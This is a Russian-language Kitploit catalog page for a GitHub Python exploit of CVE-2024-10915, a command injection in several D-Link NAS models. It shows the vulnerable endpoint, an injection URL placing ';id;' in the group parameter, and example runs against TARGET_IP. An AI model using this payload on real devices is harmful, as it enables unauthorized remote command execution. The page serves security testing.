Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-10915 — Эксплойт на Python для CVE-2024-10915, уязвимости внедрения команд в устройствах D-Link NAS. Выполняет произвольные системные команды через конечную точку /cgi-bin/account_mgr.cgi для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/r0otk3r/cve-2024-10915
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed Teaming
GitHubr0otk3r/cve-2024-10915

CVE-2024-10915

Эксплойт на Python для CVE-2024-10915, уязвимости внедрения команд в устройствах D-Link NAS. Выполняет произвольные системные команды через конечную точку /cgi-bin/account_mgr.cgi для авторизованного тестирования безопасности.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-10915 - Эксплуатация внедрения команд в D-Link NAS

Этот эксплойт на Python предназначен для уязвимости внедрения команд в нескольких продуктах D-Link NAS через конечную точку /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. Уязвимость позволяет неаутентифицированным злоумышленникам выполнять произвольные системные команды на затронутом устройстве.

Описание

CVE-2024-10915 затрагивает несколько моделей D-Link NAS. Злоумышленник может внедрять команды через параметр group в команде cgi_user_add, что приводит к удаленному выполнению кода.

Затронутые продукты

  • D-Link DNS-320

  • D-Link DNS-320LW

  • D-Link DNS-325

  • D-Link DNS-340L

root@kitploit:~
Уязвимая конечная точка: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add

Пример:

root@kitploit:~
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'

Требования

  • Python 3.x

  • requests library

Установите необходимые зависимости:

root@kitploit:~
pip3 install requests

Использование

root@kitploit:~
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]

Параметры:

Пример 1

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt 
id

Пример 2

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt 
uname

Пример 3

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt 
ifconfig

⚠️ Отказ от ответственности

Этот проект предназначен только для образовательных целей и авторизованного тестирования. Не используйте этот инструмент в сетях или системах, на которые у вас нет явного разрешения. Авторы не несут ответственности за любое неправомерное использование или причиненный ущерб.


Официальные каналы

  • YouTube @rootctf
  • X @r0otk3r
Скачать инструмент
ПараметрОписание
-u / --urlБазовый URL цели (например, http://192.168.1.100)
-c / --commandКоманда для выполнения на устройстве (по умолчанию: id)
-p / --proxyИспользовать HTTP-прокси (например, http://127.0.0.1:8080)
-o / --outputСохранить HTTP-ответ в файл
-l / --listВывести список затронутых продуктов D-Link NAS